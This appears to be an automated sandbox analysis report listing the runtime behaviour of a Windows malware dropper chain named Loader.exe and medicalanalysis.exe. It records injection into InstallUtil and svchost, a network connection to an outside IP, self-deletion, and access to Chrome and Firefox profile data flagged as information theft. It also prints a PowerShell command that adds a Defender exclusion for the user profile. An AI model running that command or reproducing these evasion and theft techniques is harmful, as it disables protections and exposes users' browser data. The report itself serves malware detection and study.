                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,12_2_00007FF7600A204C
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A64E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,12_2_00007FF7600A64E4
                    Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\
                    Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\
                    Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\
                    Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\
                    Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\
                    Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\client
                    Source: javaw.exe, 00000003.00000003.2175448821.0000000015266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
                    Source: javaw.exe, 00000003.00000003.2175448821.0000000015266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: org/omg/CORBA/OMGVMCID.classPK
                    Source: javaw.exe, 00000003.00000002.4535680788.0000000002AE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cjava/lang/VirtualMachineError
                    Source: javaw.exe, 00000003.00000002.4535680788.0000000002AE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t[Ljava/lang/VirtualMachineError;
                    Source: javaw.exe, 00000003.00000003.2175448821.0000000015266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )Q+com/sun/corba/se/impl/util/SUNVMCID.classPK
                    Source: javaw.exe, 00000003.00000003.2175448821.0000000015266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: java/lang/VirtualMachineError.classPK
                    Source: javaw.exe, 00000003.00000002.4535680788.0000000002AE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lVirtualMachineError.java
                    Source: javaw.exe, 00000003.00000002.4532484003.000000000103B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeCode function: 2_2_00401150 SetUnhandledExceptionFilter,__getmainargs,_iob,_iob,_setmode,_iob,_iob,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,2_2_00401150
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A8790 SetUnhandledExceptionFilter,12_2_00007FF7600A8790
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A8494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF7600A8494
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeMemory protected: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.37.175.218 7982
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 401000
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 449000
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 478000
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 47C000
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 47E000
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: E4A008
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeProcess created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe "C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;ddfrt658\jphp-gui-ext.jar;ddfrt658\jphp-gui-jfoenix-ext.jar;ddfrt658\jphp-json-ext.jar;ddfrt658\jphp-jsoup-ext.jar;ddfrt658\jphp-runtime.jar;ddfrt658\jphp-xml-ext.jar;ddfrt658\jphp-zend-ext.jar;ddfrt658\jphp-zip-ext.jar;ddfrt658\jsoup.jar;ddfrt658\slf4j-api.jar;ddfrt658\slf4j-simple.jar;ddfrt658\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\8b774b6fbd21273c42f034e15d863942.bat
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                    Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout 1 && del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeProcess created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe "c:\users\user\appdata\local\temp\campaignhardwarelauncher\ddfrt657\bin\javaw.exe" -dfile.encoding=utf-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;ddfrt658\jphp-gui-ext.jar;ddfrt658\jphp-gui-jfoenix-ext.jar;ddfrt658\jphp-json-ext.jar;ddfrt658\jphp-jsoup-ext.jar;ddfrt658\jphp-runtime.jar;ddfrt658\jphp-xml-ext.jar;ddfrt658\jphp-zend-ext.jar;ddfrt658\jphp-zip-ext.jar;ddfrt658\jsoup.jar;ddfrt658\slf4j-api.jar;ddfrt658\slf4j-simple.jar;ddfrt658\zt-zip.jar" org.develnext.jphp.ext.javafx.fxlauncher
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exeProcess created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe "c:\users\user\appdata\local\temp\campaignhardwarelauncher\ddfrt657\bin\javaw.exe" -dfile.encoding=utf-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;ddfrt658\jphp-gui-ext.jar;ddfrt658\jphp-gui-jfoenix-ext.jar;ddfrt658\jphp-json-ext.jar;ddfrt658\jphp-jsoup-ext.jar;ddfrt658\jphp-runtime.jar;ddfrt658\jphp-xml-ext.jar;ddfrt658\jphp-zend-ext.jar;ddfrt658\jphp-zip-ext.jar;ddfrt658\jsoup.jar;ddfrt658\slf4j-api.jar;ddfrt658\slf4j-simple.jar;ddfrt658\zt-zip.jar" org.develnext.jphp.ext.javafx.fxlauncherJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A11CC LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,12_2_00007FF7600A11CC
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe Queries volume information: C:\Users\user\AppData\Local\Temp\medicalanalysispro.zip VolumeInformation
                    Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe Queries volume information: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe Queries volume information: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Program Files\Windows Media Player\wmplayer.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe Code function: 12_2_00007FF7600A8964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,12_2_00007FF7600A8964
                    Source: C:\Users\user\Desktop\Loader.exe Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings

                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js

                    Stealing of Sensitive Information

                    Source: Yara match File source: 00000010.00000003.2840379092.00000000003E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000010.00000002.2935727529.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000F.00000002.2844728394.0000000001320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\safebrowsing
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\startupCache
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\trash4675
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\ms-language-packs\browser\newtab
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\safebrowsing\google4
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\entries
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\thumbnails
                    Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome
